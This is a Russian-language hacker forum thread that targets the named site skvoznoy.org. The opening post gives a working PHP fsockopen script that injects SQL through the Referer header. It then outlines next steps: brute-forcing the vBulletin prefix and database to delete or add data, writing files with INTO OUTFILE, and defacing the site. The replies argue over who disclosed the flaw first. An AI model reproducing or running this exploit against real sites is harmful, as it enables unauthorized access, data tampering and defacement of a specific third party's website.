skvoznoy.org Мимо проходил. Сайт из серии крутых хакеров: skvoznoy.org ____________________________________ $fp=fsockopen("skvoznoy.org",80); fputs($fp,"GET http://skvoznoy.org/news/332/ HTTP/1.0 Referer: http://skvoznoy.org/news/332/' union select 0,0/* "); $get= fgets($fp).fgets($fp).fgets($fp).fgets($fp) .fgets($fp).fgets($fp).fgets($fp).fgets($fp) .fgets($fp).fgets($fp) .fgets($fp).fgets($fp); fclose($fp); echo $get; ____________________________________ SQL-инъекция классическая в реферере. Цветом выделено 0,0 - неверное количество колонок, чтобы показать ошибку при выводе $get. На самом деле колонка одна. Вот, на сайте стоит вБуллетин. Надо сбрутить только преффикс и возможно БД для форума и можно будет удалять/добавлять данные. А можно похимичить и с ИНТО ОУТФАЙЛ. Еще можно сбрутить имя таблицы новостей и задефейсить сайт
fsockopen очень уж часто я с ним сталкиваюсь. И понятно почему =) Надо же.... Zadoxlik рано в паблик скинул ИМХО =)
Не, это просто пример эксплуатации с помощью PHP скрипта, ибо браузером ты такое не сделаешь. На сколько мне известно, все нормальные люди пользуют в таких случаях InetCrack (или как-то так), но у меня его нет.
хех, эту уявзимость уже я наверное месяц назад на паблик выложил (смотри в теме "бажные сайты от киборга"). и никто даже не пытался прикрыть
Во-первых это не эта уязвимость, а во-вторых то что выложил ты, достаточно трудно превратить в уязвимость, а не багу сайта. Если я что ошибся, и имелось ввиду не "http://skvoznoy.org/news-cat/21'/" а что-то другое, то извините за неумышленный плагиат, тему можно будет удалить
